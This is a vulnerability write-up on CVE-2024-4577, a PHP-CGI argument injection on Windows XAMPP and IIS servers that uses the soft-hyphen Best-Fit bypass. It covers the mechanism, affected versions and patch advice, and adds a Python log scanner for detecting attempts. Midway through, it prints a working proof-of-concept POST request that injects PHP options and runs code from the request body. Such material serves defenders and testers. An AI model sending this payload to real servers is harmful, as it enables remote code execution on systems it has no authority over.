RCE Unleashed: CVE-2024-4577 in XAMPP’s PHP CGI

About CVE-2024-4577 PHP-CGI Vulnerability

CVE-2024-4577 lets attackers execute arbitrary commands remotely on Windows servers running PHP. The flaw is in the PHP-CGI script engine and applies regardless of how PHP is set up. It impacts IIS web servers and XAMPP servers, both widely used platforms for hosting web applications. With a CVSS score of 9.8, this vulnerability is of critical severity.

Exploit via Best-Fit Encoding

This bug affects PHP when running in CGI mode, where the web server receives the HTTP request and launches the PHP interpreter, passing parts of the request to it as command-line arguments. For instance, a request like http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar.

Because request data becomes command-line arguments, this process can lead to command injection unless the arguments are carefully handled and escaped. The loophole attackers exploit is Windows' "Best-Fit" behaviour, which converts certain Unicode characters into similar-looking ASCII characters when the arguments are passed to the process.

For example, consider two php.exe commands, one malicious and one safe. They look identical, but a hex editor shows the difference: the safe command uses a normal dash (0x2D), while the malicious one uses a "soft hyphen" (0xAD). The two characters look alike but are treated differently: Apache escapes the normal dash but not the soft hyphen, and Windows then best-fits the soft hyphen back into a dash, so the escaping is bypassed and harmful commands run.

How is it exploited?

To achieve remote code execution (RCE), the following arguments need to be injected:

-d allow_url_include=1 -d auto_prepend_file=php://input

These options make PHP include the HTTP request body (php://input) as PHP code before running the requested script. A "soft hyphen" (0xAD) is used in place of the normal hyphen to test whether it bypasses the escaping:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

If successful, we get a phpinfo page, confirming RCE.

To automate this test, users can check out this script on GitHub.
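From the defender's side, the same argument-passing rule can be used to spot injection attempts in web server logs. The script below is an added example, not code from the original post or from any project it references: it mirrors how Apache's mod_cgi turns a query string into extra argv entries (only when the raw query contains no literal "=", which is why the request above encodes it as %3d), then flags any argument that php-cgi would read as an option, distinguishing a literal dash from the soft hyphen 0xAD that Best-Fit turns into one. The log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote_to_bytes

# Bytes that reach php-cgi's argv as an ASCII '-': the real dash, and the soft
# hyphen 0xAD that Windows "Best-Fit" code-page conversion turns into a dash.
BEST_FIT_DASH = {0x2D, 0xAD}
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/')

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jun/2024:10:00:00 +0000] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 5120',
    '10.0.0.6 - - [07/Jun/2024:10:00:01 +0000] "GET /index.php?page=home&lang=en-US HTTP/1.1" 200 1024',
    '10.0.0.7 - - [07/Jun/2024:10:00:02 +0000] "GET /info.php?-d+display_errors%3d1 HTTP/1.1" 200 300',
    '10.0.0.8 - - [07/Jun/2024:10:00:03 +0000] "GET /about.php HTTP/1.1" 200 800',
]

def cgi_argv_from_query(query):
    """Mirror how Apache's mod_cgi turns a query string into extra argv entries
    (RFC 3875 section 4.4): only a raw query with no literal '=' is split on '+'
    and each piece percent-decoded. The exploit encodes '=' as %3d for this reason."""
    if not query or "=" in query:
        return []
    return [unquote_to_bytes(piece) for piece in query.split("+")]

def php_cgi_option_injection(argv):
    """Return (option, value, via_best_fit) for each argv entry php-cgi would read
    as an option. via_best_fit is True when the leading byte is the soft hyphen."""
    findings = []
    for i, arg in enumerate(argv):
        if len(arg) < 2 or arg[0] not in BEST_FIT_DASH or not bytes([arg[1]]).isalpha():
            continue
        option = arg[1:].decode("latin-1")
        # A bare option letter such as -d takes its value from the next argv entry.
        value = argv[i + 1].decode("latin-1") if len(option) == 1 and i + 1 < len(argv) else ""
        findings.append((option, value, arg[0] == 0xAD))
    return findings

def scan_log_line(line):
    """Findings for one access-log line; empty list when nothing looks injected."""
    match = REQUEST_LINE.search(line)
    if not match:
        return []
    return php_cgi_option_injection(cgi_argv_from_query(match.group(1).partition("?")[2]))

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for option, value, best_fit in scan_log_line(line):
            kind = "soft hyphen 0xAD (escaping bypass)" if best_fit else "literal dash"
            print(f"{line.split()[0]}: -{option} {value} [{kind}]")
```

A literal-dash finding is escaped by a patched PHP and is mostly a sign of scanning; a soft-hyphen finding against an unpatched Windows host is the bypass described above and warrants checking the response size and the request body.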

Affected Versions:

  • 8.3 < 8.3.8
  • 8.2 < 8.2.20
  • 8.1 < 8.1.29
  • 8.0
  • 7 and 5 (no longer supported, so no fix is available)

Conditions Required for Exploiting CVE-2024-4577

Attackers can exploit CVE-2024-4577 under specific conditions. Common scenarios include:

  1. Copying executables to the CGI-Bin directory:
  • Placing php.exe or php-cgi.exe in the /cgi-bin/ directory, making them accessible via the web server.
  2. Exposing the PHP directory via the ScriptAlias directive:
  • Configuring the server to expose the PHP directory using the ScriptAlias directive, for example:
  • ScriptAlias /php-cgi/ "C:/xampp/php/"

Conclusion

CVE-2024-4577 is a significant risk to PHP systems, particularly on IIS and XAMPP servers. Given how simple the exploit is and how widely PHP and XAMPP are deployed, it is a prime target for attackers. Admins and developers must apply the patches or upgrade to a fixed version swiftly.
